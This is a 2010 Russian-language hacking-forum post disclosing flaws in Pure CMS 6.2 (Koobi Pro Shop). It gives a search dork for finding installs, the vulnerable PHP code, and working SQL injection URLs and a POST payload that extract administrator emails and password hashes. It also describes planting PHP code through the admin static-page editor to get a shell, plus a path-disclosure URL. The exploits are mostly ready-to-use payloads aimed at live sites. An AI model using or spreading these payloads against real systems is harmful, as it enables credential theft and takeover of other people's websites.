Старый 10.07.2010, 21:50   #1
v1d0q
 
Аватар для v1d0q
 
Регистрация: 09.07.2010
Сообщений: 91
Репутация: 85
По умолчанию Уязвимости Koobi Pro Shop Pure CMS

Уязвимости Koobi Pro Shop Pure CMS 6.2 + возможно уязвимы <-е версии.

Ищется по дорку: `Powered by Pure CMS 6.2 RUS Overdoze Team [ antichat.ru & overdoze.ru ]` > вроде как создатели какие-то Дайвер и Макс, видимо забросили и "это" уже те, кто дописывал данный движок
Профикс: Вероятнее всего => "kpro"
Хэширование: md5(md5($pass))
Адм&панель: /admin/


1)sqli

PHP код:
$sql $db->Query("SELECT * FROM ".PREFIX."_gallery WHERE id=$_REQUEST[galid] ");
                
$row_gal $sql->fetchrow(); 
Эксплуатация

Код:
index.php?p=gallerypic&img_id=9&galid=2+or+(1,1)=(select+count(0),concat((select+concat_ws(0x3a,email,pass)+from+[prefix]_user+where+ugroup=1),floor(rand(0)*2))from(information_schema.columns)group+by+2)&area=1&ascdesc=desc

2)sqli

PHP код:
$sql $db->Query("SELECT * FROM ".PREFIX."_gallery_items WHERE id=$_REQUEST[img_id] ");
        
$row $sql->fetchrow(); 
Эксплуатация

Код:
index.php?p=gallerypic&img_id=-9+union+select+1,2,3,0x78656b,5,6,concat_ws(0x3a,email,pass),8,9+from+[prefix]_user+where+ugroup=1&galid=1&area=1&ascdesc=desc

3)Inject INSERT

/functions/Func.InOutput.php
PHP код:
function iform($text$chars$allowed)
{
    global 
$pref;
    
$text addslashes($text);
    
$text strip_tags($text"" $allowed "");
    
$text substr($text0$chars);
    return 
$text;

/functions/Func.Post.php

PHP код:
function formtext($text,$maxlength){
        
$text substr($text,0$maxlength);
        return 
$text;

/system/gallerypic.php

PHP код:
if(!$error){
$text formtext($_POST['text'],$MAXCOMMLENGTH);
$sql $db->Query("INSERT INTO ".PREFIX."_gallerycomments (id, imgid, ctime, autor, title, comment, ip) VALUES ('','".(int)$_REQUEST['img_id']."', '".time()."', '".$UID."', '".iform($_POST['title'],"255","")."', '".$text."', '".$_SERVER['REMOTE_ADDR']."')"); 
Эксплуатация

POST parameters
Код:
title=[qqq=254]\\&kmode=&kmode=normal&text=, (select concat(email,0x3a,pass) from [prefix]_users where ugroup=1 limit 0,1),1)#&scode=[security-code]&do=send&area=1
= видим пароль в заголовке комментария.


4)Заливка шелла

Вроде как не я первый нашел. Потому опишу в двух словах. За подробностями обращайтесь к гуглу.
Админка-Статические страницы>Создать документ
Название => rdot
Текст => {php} phpinfo(); {/php}
connect => /index.php?area=1&p=static&page=rdot


5)пути

Код:
/inc/init.php
Заметка
Хотел бы высказать пару деталей при поиске - баги n-4.
Если мы будем отсылать запрос через тот же Live HTTP Header, то при попытке вставить 1 слеш в "title", он вообще не будет интерпретироваться => запрос выполнится => в базу слеша не попадет.

Если же мы будем ставить слеш в самом поле ввода "title", то он будет интерпретироватся в урл-энкод "%5C" и сооствественно попадет в базу отслешированый слеш addslashes'ом, т.е. "\\".

А когда в Live HTTP Header мы используем 2 слеша, то получаем отслешированый слеш + addslashes => aaa[254]\\\\

********************* (c)v1d0q ********************

ps. Hello new antichat

Последний раз редактировалось (dm); 19.08.2010 в 01:23.. Причина: изменение заголовка
v1d0q вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot